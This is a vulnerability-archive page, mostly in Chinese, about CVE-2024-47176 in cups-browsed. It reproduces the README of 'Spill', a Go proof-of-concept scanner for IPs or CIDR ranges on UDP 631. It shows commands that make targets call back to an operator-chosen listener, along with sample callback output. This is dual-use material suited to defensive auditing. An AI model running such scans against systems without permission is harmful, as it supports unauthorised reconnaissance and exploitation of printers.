关联漏洞
标题:
cups 安全漏洞
(CVE-2024-47176)
描述:cups是cups开源的一个类 Unix 操作系统的组合式印刷系统。 cups存在安全漏洞,该漏洞源于cups-browsed绑定到INADDR_ANY:631,导致它信任来自任何来源的任何数据包,并可能导致向攻击者控制的 URL 发出Get-Printer-Attributes IPP 请求。
描述
POC scanner for CVE-2024-47176
介绍
# Spill
Utility to quickly scan over a signle IP / CIDR to search for OpenPrinting CVE 2024-47176 on UDP 631
This utility is quick and ugly - but could be useful to some people.
## Build Project
```
go build .
```
## Quick usage (single IP)
```
go run main.go -ip <target-ip> -port 631 -dest <your listening ip> -destport <your listening port>
OR
./spill -ip <target-ip> -port 631 -dest <your listening ip> -destport <your listening port>
```
## Quick usage (CIDR)
```
go run main.go -cidr <target-range> -port 631 -dest <your listening ip> -destport <your listening port>
OR
./spill -cidr <target-range> -port 631 -dest <your listening ip> -destport <your listening port>
```
## Example Output
```zsh
┌──(kali㉿kali-raspberry-pi)-[~/spill]
└─$ ./spill -ip 192.168.50.174 -port 631 -dest 192.168.50.175 -destport 12345
2024/09/27 03:28:12 Starting HTTP server on port 12345...
2024/09/27 03:28:12 Received POST request: 192.168.50.174:55580
2024/09/27 03:28:12 Received POST request: 192.168.50.174:55592
2024/09/27 03:28:12 Received POST request: 192.168.50.174:55614
2024/09/27 03:28:13 Received POST request: 192.168.50.174:55620
2024/09/27 03:28:13 Received POST request: 192.168.50.174:55636
2024/09/27 03:28:13 Received POST request: 192.168.50.174:55662
```
文件快照
[4.0K] /data/pocs/33c9e55f3d3348d730fbf02fca0e97458383c210
├── [ 24] go.mod
├── [3.7K] main.go
└── [1.3K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。